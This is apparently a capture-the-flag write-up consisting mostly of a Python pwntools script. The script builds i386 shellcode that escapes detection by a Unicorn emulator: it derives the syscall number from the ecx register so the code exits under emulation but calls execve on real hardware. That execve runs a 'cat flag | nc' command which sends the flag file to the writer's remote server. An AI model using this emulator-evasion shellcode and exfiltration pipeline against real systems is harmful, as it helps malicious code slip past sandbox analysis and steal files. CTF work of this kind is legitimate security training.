When unicorn is started, all value in regs is 0, but in realworld it's not.

We can find ecx is 0x100 when our payload starts, so we can make some weird code to change (0x0) to (0x1) ,which is sys_exit, and at the same time, it can change (0x100) to (0x11), which is sys_execve.

```python
from pwn import *
from base64 import b64encode
context(log_level='info', arch='i386')

ip = '<my_vps_ip>'
# ip='127.0.0.1'
output_port = 11002

cmd = 'cat flag | nc {} {}'.format(ip, output_port)
op = ''
op += '\n'.join([
'mov eax, ecx', # ecx is 0x100 in realworld, 0x0 in unicorn simulator
'sar eax, 5',
'mov ebx, ecx',
'sar ebx, 7',
'add eax, ebx',
'add eax, 1'
])
op += shellcraft.pushstr('/bin/bash')
op += 'mov ebx, esp\n'
op += shellcraft.pushstr_array('ecx', ['/bin/bash', '-c', cmd])
op += '\n'.join([
'xor edx, edx',
'int 0x80',
])
print(op)
send_content = b64encode(asm(op))
print(send_content)
```